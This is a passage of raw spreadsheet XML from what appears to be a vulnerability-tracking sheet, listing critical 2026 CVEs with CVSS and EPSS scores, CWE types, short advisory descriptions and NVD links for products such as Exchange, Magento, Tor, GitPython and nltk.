t="inlineStr"><is><t>CVE-2026-62928</t></is></c><c r="D150" s="5" t="n"><v>9.300000000000001</v></c><c r="E150" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F150" s="5" t="inlineStr"><is><t>vultures@jpcert.or.jp</t></is></c><c r="G150" s="5" t="inlineStr" /><c r="H150" s="5" t="n"><v>0.012</v></c><c r="I150" s="5" t="inlineStr" /><c r="J150" s="5" t="inlineStr" /><c r="K150" s="5" t="inlineStr" /><c r="L150" s="5" t="inlineStr" /><c r="M150" s="5" t="inlineStr" /><c r="N150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O150" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P150" s="5" t="inlineStr" /><c r="Q150" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R150" s="5" t="inlineStr"><is><t>XING CPTrans-ME-X contains an OS Command Injection (CWE-78). Unauthenticated OS command may be injected.</t></is></c><c r="S150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62928</t></is></c></row><row r="151"><c r="A151" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B151" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C151" s="5" t="inlineStr"><is><t>CVE-2026-66794</t></is></c><c r="D151" s="5" t="n"><v>9.300000000000001</v></c><c r="E151" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F151" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G151" s="5" t="inlineStr" /><c r="H151" s="5" t="n"><v>0.004</v></c><c r="I151" s="5" t="inlineStr" /><c r="J151" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K151" s="5" t="inlineStr" /><c r="L151" s="5" t="inlineStr" /><c r="M151" s="5" t="inlineStr" /><c r="N151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O151" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P151" s="5" t="inlineStr" /><c r="Q151" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R151" s="5" t="inlineStr"><is><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is></c><c r="S151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66794</t></is></c></row><row r="152"><c r="A152" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C152" s="5" t="inlineStr"><is><t>CVE-2026-69356</t></is></c><c r="D152" s="5" t="n"><v>9.300000000000001</v></c><c r="E152" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F152" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G152" s="5" t="inlineStr" /><c r="H152" s="5" t="n"><v>0.007</v></c><c r="I152" s="5" t="inlineStr" /><c r="J152" s="5" t="inlineStr" /><c r="K152" s="5" t="inlineStr" /><c r="L152" s="5" t="inlineStr" /><c r="M152" s="5" t="inlineStr" /><c r="N152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P152" s="5" t="inlineStr" /><c r="Q152" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R152" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t></is></c></row><row r="153"><c r="A153" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B153" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C153" s="5" t="inlineStr"><is><t>CVE-2026-69657</t></is></c><c r="D153" s="5" t="n"><v>9.300000000000001</v></c><c r="E153" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F153" s="5" t="inlineStr"><is><t>vultures@jpcert.or.jp</t></is></c><c r="G153" s="5" t="inlineStr" /><c r="H153" s="5" t="n"><v>0.003</v></c><c r="I153" s="5" t="inlineStr" /><c r="J153" s="5" t="inlineStr" /><c r="K153" s="5" t="inlineStr" /><c r="L153" s="5" t="inlineStr" /><c r="M153" s="5" t="inlineStr" /><c r="N153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O153" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P153" s="5" t="inlineStr" /><c r="Q153" s="5" t="inlineStr"><is><t>CWE-1393</t></is></c><c r="R153" s="5" t="inlineStr"><is><t>XING CPTrans-ME-X contains a Use of Default Password (CWE-1393). Anyone with the knowledge of the credential may log in to the affected device.</t></is></c><c r="S153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69657</t></is></c></row><row r="154"><c r="A154" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B154" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C154" s="5" t="inlineStr"><is><t>CVE-2026-70403</t></is></c><c r="D154" s="5" t="n"><v>9.300000000000001</v></c><c r="E154" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F154" s="5" t="inlineStr"><is><t>vultures@jpcert.or.jp</t></is></c><c r="G154" s="5" t="inlineStr" /><c r="H154" s="5" t="n"><v>0.003</v></c><c r="I154" s="5" t="inlineStr" /><c r="J154" s="5" t="inlineStr" /><c r="K154" s="5" t="inlineStr" /><c r="L154" s="5" t="inlineStr" /><c r="M154" s="5" t="inlineStr" /><c r="N154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O154" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P154" s="5" t="inlineStr" /><c r="Q154" s="5" t="inlineStr"><is><t>CWE-259</t></is></c><c r="R154" s="5" t="inlineStr"><is><t>XING CPTrans-ME-X contains a Use of Hard-coded Password (CWE-259). Anyone with the knowledge of the credential may log in to the affected device.</t></is></c><c r="S154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70403</t></is></c></row><row r="155"><c r="A155" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C155" s="5" t="inlineStr"><is><t>CVE-2026-76200</t></is></c><c r="D155" s="5" t="n"><v>9.300000000000001</v></c><c r="E155" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F155" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G155" s="5" t="inlineStr" /><c r="H155" s="5" t="n"><v>0.005</v></c><c r="I155" s="5" t="inlineStr" /><c r="J155" s="5" t="inlineStr" /><c r="K155" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L155" s="5" t="inlineStr" /><c r="M155" s="5" t="inlineStr" /><c r="N155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P155" s="5" t="inlineStr" /><c r="Q155" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R155"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S155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t></is></c></row><row r="156"><c r="A156" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C156" s="5" t="inlineStr"><is><t>CVE-2026-76201</t></is></c><c r="D156" s="5" t="n"><v>9.300000000000001</v></c><c r="E156" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F156" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G156" s="5" t="inlineStr" /><c r="H156" s="5" t="n"><v>0.005</v></c><c r="I156" s="5" t="inlineStr" /><c r="J156" s="5" t="inlineStr" /><c r="K156" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L156" s="5" t="inlineStr" /><c r="M156" s="5" t="inlineStr" /><c r="N156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P156" s="5" t="inlineStr" /><c r="Q156" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R156" s="5" t="inlineStr"><is><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is></c><c r="S156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t></is></c></row><row r="157"><c r="A157" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B157" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C157" s="5" t="inlineStr"><is><t>CVE-2026-77642</t></is></c><c r="D157" s="5" t="n"><v>9.300000000000001</v></c><c r="E157" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G157" s="5" t="inlineStr" /><c r="H157" s="5" t="n"><v>0.002</v></c><c r="I157" s="5" t="inlineStr" /><c r="J157" s="5" t="inlineStr" /><c r="K157" s="5" t="inlineStr"><is><t>torproject:tor</t></is></c><c r="L157" s="5" t="inlineStr" /><c r="M157" s="5" t="inlineStr" /><c r="N157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O157" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P157" s="5" t="inlineStr" /><c r="Q157" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R157" s="5" t="inlineStr"><is><t>tor before 0.4.9.9 was prone to an out-of-bounds write when parsing a consensus or  detached signature with unexpected signature digest type. Impact  is minor for most Tor roles, but potentially major for directory   authorities. This is TROVE-2026-019.</t></is></c><c r="S157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77642</t></is></c></row><row r="158"><c r="A158" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B158" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C158" s="5" t="inlineStr"><is><t>CVE-2026-78012</t></is></c><c r="D158" s="5" t="n"><v>9.300000000000001</v></c><c r="E158" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F158" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G158" s="5" t="inlineStr" /><c r="H158" s="5" t="n"><v>0.005</v></c><c r="I158" s="5" t="inlineStr" /><c r="J158" s="5" t="inlineStr" /><c r="K158" s="5" t="inlineStr" /><c r="L158" s="5" t="inlineStr" /><c r="M158" s="5" t="inlineStr" /><c r="N158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O158" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P158" s="5" t="inlineStr" /><c r="Q158" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R158" s="5" t="inlineStr"><is><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is></c><c r="S158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78012</t></is></c></row><row r="159"><c r="A159" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B159" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C159" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D159" s="5" t="n"><v>9.300000000000001</v></c><c r="E159" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F159" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G159" s="5" t="inlineStr" /><c r="H159" s="5" t="n"><v>0.004</v></c><c r="I159" s="5" t="inlineStr" /><c r="J159" s="5" t="inlineStr" /><c r="K159" s="5" t="inlineStr" /><c r="L159" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M159" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N159" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O159" s="5" t="inlineStr" /><c r="P159" s="5" t="inlineStr" /><c r="Q159" s="5" t="inlineStr"><is><t>CWE-88, CWE-94</t></is></c><c r="R159"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S159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="160"><c r="A160" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C160" s="5" t="inlineStr"><is><t>CVE-2026-78997</t></is></c><c r="D160" s="5" t="n"><v>9.300000000000001</v></c><c r="E160" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F160" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G160" s="5" t="inlineStr" /><c r="H160" s="5" t="n"><v>0.003</v></c><c r="I160" s="5" t="inlineStr" /><c r="J160" s="5" t="inlineStr" /><c r="K160" s="5" t="inlineStr" /><c r="L160" s="5" t="inlineStr" /><c r="M160" s="5" t="inlineStr" /><c r="N160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P160" s="5" t="inlineStr" /><c r="Q160" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R160" s="5" t="inlineStr"><is><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is></c><c r="S160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t></is></c></row><row r="161"><c r="A161" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B161" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C161" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D161" s="5" t="n"><v>9.300000000000001</v></c><c r="E161" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F161" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G161" s="5" t="inlineStr" /><c r="H161" s="5" t="n"><v>0.012</v></c><c r="I161" s="5" t="inlineStr" /><c r="J161" s="5" t="inlineStr" /><c r="K161" s="5" t="inlineStr" /><c r="L161" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M161" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N161" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O161" s="5" t="inlineStr" /><c r="P161" s="5" t="inlineStr" /><c r="Q161" s="5" t="inlineStr"><is><t>CWE-502, CWE-693</t></is></c><c r="R161"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S161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="162"><c r="A162" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B162" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C162" s="5" t="inlineStr"><is><t>CVE-2026-82526</t></is></c><c r="D162" s="5" t="n"><v>9.300000000000001</v></c><c r="E162" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F162" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G162" s="5" t="inlineStr" /><c r="H162" s="5" t="n"><v>0.004</v></c><c r="I162" s="5" t="inlineStr" /><c r="J162" s="5" t="inlineStr"><is><t>postgresql</t></is></c><c r="K162" s="5" t="inlineStr" /><c r="L162" s="5" t="inlineStr" /><c r="M162" s="5" t="inlineStr" /><c r="N162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O162" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P162" s="5" t="inlineStr" /><c r="Q162" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R162" s="5" t="inlineStr"><is><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is></c><c r="S162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82526</t></is></c></row><row r="163"><c r="A163" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B163" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C163" s="5" t="inlineStr"><is><t>CVE-2026-84479</t></is></c><c r="D163" s="5" t="n"><v>9.300000000000001</v></c><c r="E163" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F163" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G163" s="5" t="inlineStr" /><c r="H163" s="5" t="n"><v>0.003</v></c><c r="I163" s="5" t="inlineStr" /><c r="J163" s="5" t="inlineStr" /><c r="K163" s="5" t="inlineStr" /><c r="L163" s="5" t="inlineStr" /><c r="M163" s="5" t="inlineStr" /><c r="N163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O163" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P163" s="5" t="inlineStr" /><c r="Q163" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="R163" s="5" t="inlineStr"><is><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is></c><c r="S163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84479</t></is></c></row><row r="164"><c r="A164" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B164" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C164" s="5" t="inlineStr"><is><t>CVE-2026-84480</t></is></c><c r="D164" s="5" t="n"><v>9.300000000000001</v></c><c r="E164" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F164" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G164" s="5" t="inlineStr" /><c r="H164" s="5" t="n"><v>0.003</v></c><c r="I164" s="5" t="inlineStr" /><c r="J164" s="5" t="inlineStr" /><c r="K164" s="5" t="inlineStr" /><c r="L164" s="5" t="inlineStr" /><c r="M164" s="5" t="inlineStr" /><c r="N164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O164" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P164" s="5" t="inlineStr" /><c r="Q164" s="5" t="inlineStr"><is><t>CWE-613</t></is></c><c r="R164" s="5" t="inlineStr"><is><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is></c><c r="S164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84480</t></is></c></row><row r="165"><c r="A165" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B165" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C165" s="5" t="inlineStr"><is><t>CVE-2026-84695</t></is></c><c r="D165" s="5" t="n"><v>9.300000000000001</v></c><c r="E165" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F165" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G165" s="5" t="inlineStr" /><c r="H165" s="5" t="n"><v>0.003</v></c><c r="I165" s="5" t="inlineStr" /><c r="J165" s="5" t="inlineStr" /><c r="K165" s="5" t="inlineStr" /><c r="L165" s="5" t="inlineStr" /><c r="M165" s="5" t="inlineStr" /><c r="N165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O165" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P165" s="5" t="inlineStr" /><c r="Q165" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R165" s="5" t="inlineStr"><is><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is></c><c r="S165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84695</t></is></c></row><row r="166"><c r="A166" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B166" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C166" s="5" t="inlineStr"><is><t>CVE-2026-85146</t></is></c><c r="D166" s="5" t="n"><v>9.300000000000001</v></c><c r="E166" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F166" s="5" t="inlineStr"><is><t>twcert@cert.org.tw</t></is></c><c r="G166" s="5" t="inlineStr" /><c r="H166" s="5" t="n"><v>0.004</v></c><c r="I166" s="5" t="inlineStr" /><c r="J166" s="5" t="inlineStr" /><c r="K166" s="5" t="inlineStr" /><c r="L166" s="5" t="inlineStr" /><c r="M166" s="5" t="inlineStr" /><c r="N166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O166" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P166" s="5" t="inlineStr" /><c r="Q166" s="5" t="inlineStr"><is><t>CWE-798</t></is></c><c r="R166" s="5" t="inlineStr"><is><t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain the SSH service account credentials and passwords for the SmartIT Agent directly from the application source code.</t></is></c><c r="S166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85146</t></is></c></row><row r="167"><c r="A167" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B167" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C167" s="5" t="inlineStr"><is><t>CVE-2026-85148</t></is></c><c r="D167" s="5" t="n"><v>9.300000000000001</v></c><c r="E167" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F167" s="5" t="inlineStr"><is><t>twcert@cert.org.tw</t></is></c><c r="G167" s="5" t="inlineStr" /><c r="H167" s="5" t="n"><v>0.004</v></c><c r="I167" s="5" t="inlineStr" /><c r="J167" s="5" t="inlineStr" /><c r="K167" s="5" t="inlineStr" /><c r="L167" s="5" t="inlineStr" /><c r="M167" s="5" t="inlineStr" /><c r="N167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O167" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P167" s="5" t="inlineStr" /><c r="Q167" s="5" t="inlineStr"><is><t>CWE-798</t></is></c><c r="R167" s="5" t="inlineStr"><is><t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can exploit a fixed password to remotely access user hosts.</t></is></c><c r="S167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85148</t></is></c></row><row r="168"><c r="A168" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B168" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C168" s="5" t="inlineStr"><is><t>CVE-2026-85154</t></is></c><c r="D168" s="5" t="n"><v>9.300000000000001</v></c><c r="E168" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F168" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G168" s="5" t="inlineStr" /><c r="H168" s="5" t="n"><v>0.003</v></c><c r="I168" s="5" t="inlineStr" /><c r="J168" s="5" t="inlineStr" /><c r="K168" s="5" t="inlineStr" /><c r="L168" s="5" t="inlineStr" /><c r="M168" s="5" t="inlineStr" /><c r="N168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O168" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P168" s="5" t="inlineStr" /><c r="Q168" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R168" s="5" t="inlineStr"><is><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is></c><c r="S168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85154</t></is></c></row><row r="169"><c r="A169" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B169" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C169" s="5" t="inlineStr"><is><t>CVE-2026-85424</t></is></c><c r="D169" s="5" t="n"><v>9.300000000000001</v></c><c r="E169" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F169" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G169" s="5" t="inlineStr" /><c r="H169" s="5" t="n"><v>0.005</v></c><c r="I169" s="5" t="inlineStr" /><c r="J169" s="5" t="inlineStr" /><c r="K169" s="5" t="inlineStr" /><c r="L169" s="5" t="inlineStr" /><c r="M169" s="5" t="inlineStr" /><c r="N169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O169" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P169" s="5" t="inlineStr" /><c r="Q169" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R169" s="5" t="inlineStr"><is><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is></c><c r="S169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85424</t></is></c></row><row r="170"><c r="A170" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B170" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C170" s="5" t="inlineStr"><is><t>CVE-2026-85425</t></is></c><c r="D170" s="5" t="n"><v>9.300000000000001</v></c><c r="E170" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F170" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G170" s="5" t="inlineStr" /><c r="H170" s="5" t="n"><v>0.01</v></c><c r="I170" s="5" t="inlineStr" /><c r="J170" s="5" t="inlineStr" /><c r="K170" s="5" t="inlineStr" /><c r="L170" s="5" t="inlineStr" /><c r="M170" s="5" t="inlineStr" /><c r="N170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O170" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P170" s="5" t="inlineStr" /><c r="Q170" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R170" s="5" t="inlineStr"><is><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is></c><c r="S170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85425</t></is></c></row><row r="171"><c r="A171" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B171" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C171" s="5" t="inlineStr"><is><t>CVE-2026-85426</t></is></c><c r="D171" s="5" t="n"><v>9.300000000000001</v></c><c r="E171" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F171" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G171" s="5" t="inlineStr" /><c r="H171" s="5" t="n"><v>0.006</v></c><c r="I171" s="5" t="inlineStr" /><c r="J171" s="5" t="inlineStr" /><c r="K171" s="5" t="inlineStr" /><c r="L171" s="5" t="inlineStr" /><c r="M171" s="5" t="inlineStr" /><c r="N171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O171" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P171" s="5" t="inlineStr" /><c r="Q171" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R171" s="5" t="inlineStr"><is><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is></c><c r="S171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85426</t></is></c></row><row r="172"><c r="A172" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B172" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C172" s="5" t="inlineStr"><is><t>CVE-2026-85434</t></is></c><c r="D172" s="5" t="n"><v>9.300000000000001</v></c><c r="E172" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F172" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G172" s="5" t="inlineStr" /><c r="H172" s="5" t="n"><v>0.002</v></c><c r="I172" s="5" t="inlineStr" /><c r="J172" s="5" t="inlineStr" /><c r="K172" s="5" t="inlineStr" /><c r="L172" s="5" t="inlineStr" /><c r="M172" s="5" t="inlineStr" /><c r="N172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O172" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P172" s="5" t="inlineStr" /><c r="Q172" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R172" s="5" t="inlineStr"><is><t>MOOS-IvP uFldShoreBroker through 24.8.1 fails to verify node ping authenticity before creating outbound bridge routes. Attackers can publish NODE_BROKER_PING messages with crafted HostRecord data to redirect bridged variables to attacker-controlled addresses.</t></is></c><c r="S172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85434</t></is></c></row><row r="173"><c r="A173" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B173" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C173" s="5" t="inlineStr"><is><t>CVE-2026-85435</t></is></c><c r="D173" s="5" t="n"><v>9.300000000000001</v></c><c r="E173" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F173" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G173" s="5" t="inlineStr" /><c r="H173" s="5" t="n"><v>0.002</v></c><c r="I173" s="5" t="inlineStr" /><c r="J173" s="5" t="inlineStr" /><c r="K173" s="5" t="inlineStr" /><c r="L173" s="5" t="inlineStr" /><c r="M173" s="5" t="inlineStr" /><c r="N173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O173" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P173" s="5" t="inlineStr" /><c r="Q173" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R173" s="5" t="inlineStr"><is><t>MOOS-IvP u</t></is></c><c r="S173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85435</t></is></c></row><row r="174"><c r="A174" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B174" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C174" s="5" t="inlineStr"><is><t>CVE-2026-85437</t></is></c><c r="D174" s="5" t="n"><v>9.300000000000001</v></c><c r="E174" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F174" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G174" s="5" t="inlineStr" /><c r="H174" s="5" t="n"><v>0.007</v></c><c r="I174" s="5" t="inlineStr" /><c r="J174" s="5" t="inlineStr" /><c r="K174" s="5" t="inlineStr" /><c r="L174" s="5" t="inlineStr" /><c r="M174" s="5" t="inlineStr" /><c r="N174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O174" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P174" s="5" t="inlineStr" /><c r="Q174" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R174" s="5" t="inlineStr"><is><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is></c><c r="S174" s="6" 